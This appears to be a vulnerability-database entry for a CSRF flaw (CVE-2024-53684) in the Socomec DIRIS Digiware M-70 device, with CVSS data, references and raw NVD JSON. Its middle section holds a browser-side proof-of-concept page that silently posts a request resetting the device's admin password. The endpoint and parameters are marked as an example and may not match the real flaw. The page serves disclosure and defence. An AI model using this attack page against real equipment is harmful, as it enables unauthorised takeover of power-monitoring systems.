Security Vulnerability Report
CVE-2024-53684 CVSS 7.5 HIGH

CVE-2024-53684

Published: 2025-12-01 16:15:51
Last Modified: 2025-12-05 21:10:43

Description

A cross-site request forgery (CSRF) vulnerability exists in the WEBVIEW-M functionality of Socomec DIRIS Digiware M-70 1.6.9. A specially crafted HTTP request can lead to unauthorized access. An attacker can stage a malicious webpage to trigger this vulnerability.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:socomec:diris_m-70_firmware:1.6.9:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:socomec:diris_m-70:-:*:*:*:*:*:*:* - NOT VULNERABLE
Socomec DIRIS Digiware M-70 1.6.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2024-53684 CSRF PoC for Socomec DIRIS Digiware M-70 -->
<!DOCTYPE html>
<html>
<head>
  <title>DIRIS Digiware M-70 CSRF PoC</title>
</head>
<body>
  <h2>CVE-2024-53684 PoC</h2>
  <p>Target: Socomec DIRIS Digiware M-70</p>
  <p id="status">Attacking...</p>
  <script>
    // Target device IP (change as needed)
    const targetIP = "192.168.1.100";
    const targetPort = "80";

    // CSRF payload - Example: Change admin password
    const csrfPayload = {
      method: 'POST',
      credentials: 'include',
      headers: {
        'Content-Type': 'application/x-www-form-urlencoded',
      },
      body: 'action=set_config&module=webview_m&param=admin_password&value=attacker_new_password'
    };

    // Execute CSRF attack
    fetch(`http://${targetIP}:${targetPort}/cgi-bin/webview_m.cgi`, csrfPayload)
      .then(response => response.text())
      .then(data => {
        console.log('CSRF attack sent');
        document.getElementById('status').innerText = 'Attack Sent';
      })
      .catch(error => {
        console.error('Error:', error);
        document.getElementById('status').innerText = 'Error: ' + error;
      });
  </script>
</body>
</html>

References

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2116 (Vendor Advisory)
https://www.socomec.fr/sites/default/files/2025-10/CVE-2024-53684---Diris-Digiware-Mxx-Dxx-_VULNERABILITIES_2025-10-01-16-43-14_English_0.pdf (Vendor Advisory)
Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-53684", "sourceIdentifier": "[email protected]", "published": "2025-12-01T16:15:50.513", "lastModified": "2025-12-05T21:10:42.877", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A cross-site request forgery (csrf) vulnerability exists in the WEBVIEW-M functionality of Socomec DIRIS Digiware M-70 1.6.9. A specially crafted HTTP request can lead to unauthorized access. An attacker can stage a malicious webpage to trigger this vulnerability."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:socomec:diris_m-70_firmware:1.6.9:*:*:*:*:*:*:*", "matchCriteriaId": "C07608BE-E7E3-44F5-AE9A-4AE36679F58A"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:socomec:diris_m-70:-:*:*:*:*:*:*:*", 
"matchCriteriaId": "153A9D26-2C76-4B6B-AFD8-22DEB2081F34"}]}]}], "references": [{"url": "https://talosintelligence.com/vulnerability_reports/TALOS-2024-2116", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.socomec.fr/sites/default/files/2025-10/CVE-2024-53684---Diris-Digiware-Mxx-Dxx-_VULNERABILITIES_2025-10-01-16-43-14_English_0.pdf", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2024-2116", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Vendor Advisory"]}]}}